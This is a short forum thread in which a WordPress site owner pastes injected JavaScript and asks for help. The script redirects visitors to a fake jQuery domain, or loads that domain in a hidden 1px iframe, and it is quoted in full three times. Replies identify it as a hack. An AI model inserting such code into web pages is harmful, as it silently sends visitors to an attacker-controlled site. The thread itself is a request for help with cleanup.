word press problem help

2 replies
does any one know how to fix this?

"/* NOTICE! You've requested a file that is not available for remote inclusion. */ try{ window.location = 'http://www.jqueryc.com'; }catch(e){ var rframe = document.createElement("iframe"); rframe.setAttribute('width','1px'); rframe.setAttribute('height','1px'); rframe.setAttribute('frameborder','0'); rframe.setAttribute('id','rfx'); rframe.setAttribute('src','http://www.jqueryc.com'); document.body.appendChild(rframe); }"
#press #problem #word
  • Profile picture of the author prince55l
    Originally Posted by vanbino View Post

    does any one know how to fix this?

    "/* NOTICE! You've requested a file that is not available for remote inclusion. */ try{ window.location = 'http://www.jqueryc.com'; }catch(e){ var rframe = document.createElement("iframe"); rframe.setAttribute('width','1px'); rframe.setAttribute('height','1px'); rframe.setAttribute('frameborder','0'); rframe.setAttribute('id','rfx'); rframe.setAttribute('src','http://www.jqueryc.com'); document.body.appendChild(rframe); }"
    i suggest you change any changes you have made on the server
    {{ DiscussionBoard.errors[8019987].message }}
  • Profile picture of the author smashad
    Originally Posted by vanbino View Post

    does any one know how to fix this?

    "/* NOTICE! You've requested a file that is not available for remote inclusion. */ try{ window.location = 'http://www.jqueryc.com'; }catch(e){ var rframe = document.createElement("iframe"); rframe.setAttribute('width','1px'); rframe.setAttribute('height','1px'); rframe.setAttribute('frameborder','0'); rframe.setAttribute('id','rfx'); rframe.setAttribute('src','http://www.jqueryc.com'); document.body.appendChild(rframe); }"
    Looks like your wp site got hacked. jqueryc(dot)com is a fake jquery site. You can refer to this article here: Careful With Fake jQuery Website – jquery-framework. com | Sucuri Blog
    {{ DiscussionBoard.errors[8020079].message }}

Trending Topics